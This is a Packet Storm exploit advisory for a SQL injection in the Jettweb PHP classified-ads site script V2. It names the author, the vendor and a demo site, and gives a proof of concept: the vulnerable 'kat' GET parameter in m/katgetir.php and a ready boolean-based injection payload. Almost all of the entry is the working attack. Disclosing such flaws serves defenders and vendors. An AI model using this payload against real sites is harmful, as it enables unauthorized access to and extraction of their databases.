Jettweb Php Hazir ilan Sitesi Scripti 2 SQL Injection

2019-03-27T00:00:00
ID PACKETSTORM:152247
Type packetstorm
Reporter Ahmet Umit Bayram
Modified 2019-03-27T00:00:00

Description

                                        
                                            `# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection  
# Date: 25.03.2019  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html  
# Demo Site: http://ilanv2.proemlaksitesi.net  
# Version: V2  
# Tested on: Kali Linux  
# CVE: N/A  
  
----- PoC : SQLi -----  
  
Request: http://localhost/[PATH]/m/katgetir.php?kat=1  
Vulnerable Parameter: kat (GET)  
Payload: kat=1' OR NOT 1300=1300-- rwTf  
`